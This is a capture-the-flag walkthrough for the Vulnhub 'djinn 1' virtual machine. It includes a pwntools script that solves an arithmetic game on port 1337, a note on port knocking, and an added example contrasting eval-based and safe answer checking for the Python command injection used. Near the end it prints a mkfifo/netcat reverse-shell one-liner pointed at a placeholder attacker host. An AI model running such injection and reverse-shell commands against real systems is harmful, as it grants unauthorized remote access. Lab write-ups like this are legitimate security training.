Vulnhub djinn 1 — Walkthrough

Recon with Nmap:

Port Scan with Nmap
Access anonymous FTP using FileZilla
Content of files located in FTP server
Game hosted on port 1337

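from pwn import *

# Connect to the game service on port 1337
conn = remote('192.168.0.102', 1337)

# Skip the banner, which ends at the first blank line
conn.recvuntil(b"\n\n", drop=True)

for i in range(1001):
    # Each challenge is parsed as (first, 'op', last)
    conn.recvuntil(b"(", drop=True)
    first = conn.recvuntil(b",", drop=True)
    conn.recvuntil(b"'", drop=True)
    arith = conn.recvuntil(b"'", drop=True)
    conn.recvuntil(b", ", drop=True)
    last = conn.recvuntil(b")", drop=True)
    # Join the pieces into one expression and send it as the answer
    final = first + arith + last
    print(str(i) + "th answer= " + final.decode())
    conn.sendlineafter(b'>', final)

conn.interactive()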

That script solves the game hosted on port 1337.

Gift after solving the game
Port knocking on the three given ports opens SSH

Tried the given creds but failed to SSH.

There is another way in, called Python command injection:

Command Injection in Game on 1337
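The root cause behind this kind of injection, shown from the service side as an added example that is not part of the original walkthrough or the VM's code. It assumes the game evaluates the submitted answer as a Python expression (as Python 2's input() does); the function names, the operator set and the sample challenge are hypothetical.

```python
import operator
import re

# Operators the game is assumed to use in its (first, 'op', last) challenges.
OPS = {"+": operator.add, "-": operator.sub, "*": operator.mul}

# A valid answer is an optionally signed decimal integer and nothing else.
ANSWER_RE = re.compile(r"[+-]?\d{1,12}")


def expected(first, op, last):
    """Compute the correct result for one challenge tuple."""
    return OPS[op](first, last)


def check_answer_unsafe(challenge, line):
    """'Before': the client's text is evaluated as Python code."""
    try:
        return eval(line) == expected(*challenge)  # runs whatever was sent
    except Exception:
        return False


def check_answer_safe(challenge, line):
    """'After': the client's text is only ever parsed as a number."""
    text = line.strip()
    if not ANSWER_RE.fullmatch(text):
        return False  # expressions, names and calls never reach an evaluator
    return int(text) == expected(*challenge)


if __name__ == "__main__":
    challenge = (7, "*", 6)  # constructed sample challenge
    for line in ("42", "7*6", " 42\n", "41"):
        print(repr(line),
              check_answer_unsafe(challenge, line),
              check_answer_safe(challenge, line))
```

The unsafe check accepts the unevaluated expression "7*6", which is exactly why the solver script above can send expressions instead of numbers; the safe check rejects anything that is not a plain integer.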

Now it is time to get a reverse shell. I found that the netcat installed on the victim does not have the backdoor functionality, so I used another one-liner reverse shell:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attacker_ip attacker_port>/tmp/f
Got Rev Shell and found 2 flags

Thanks to:

Ananda Chaudhury

Anutosh Roy

for your awesome contributions.
